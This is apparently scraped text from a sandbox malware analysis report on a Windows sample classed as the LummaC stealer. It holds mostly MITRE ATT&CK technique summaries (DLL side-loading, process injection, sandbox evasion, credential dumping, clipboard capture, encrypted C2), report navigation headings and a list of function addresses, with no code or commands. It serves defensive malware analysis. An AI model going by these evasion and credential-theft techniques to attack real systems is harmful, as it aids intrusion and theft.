Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 0x001f00000004676d-1858.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

\Device\ConDrv

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Possible Origin

Windows Analysis Report
0x001f00000004676d-1858.exe

Function 00BAA19E Relevance: 44.0, APIs: 11, Strings: 14, Instructions: 295
threadinjectionmemoryCOMMON

Function 00B71FB0 Relevance: 9.2, APIs: 6, Instructions: 200
fileCOMMON

Function 00B724B0 Relevance: 10.6, APIs: 7, Instructions: 83
threadCOMMON

Function 00B8CF0B Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74
COMMONLIBRARYCODE

Function 00B71750 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 390
COMMON

Function 00B85349 Relevance: 4.6, APIs: 3, Instructions: 51
threadCOMMON

Function 00B854EE Relevance: 4.5, APIs: 3, Instructions: 30
threadCOMMON

Function 00B8565F Relevance: 4.5, APIs: 3, Instructions: 15
COMMONLIBRARYCODE

Function 00B93BF4 Relevance: 3.2, APIs: 2, Instructions: 196
fileCOMMONLIBRARYCODE

Function 00B943CD Relevance: 3.1, APIs: 2, Instructions: 80
fileCOMMONLIBRARYCODE

Function 00B790F0 Relevance: 3.1, APIs: 2, Instructions: 73
COMMON

Function 00B8DA52 Relevance: 3.1, APIs: 2, Instructions: 65
COMMON

Function 00B71EF0 Relevance: 3.1, APIs: 2, Instructions: 60
memoryCOMMON

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre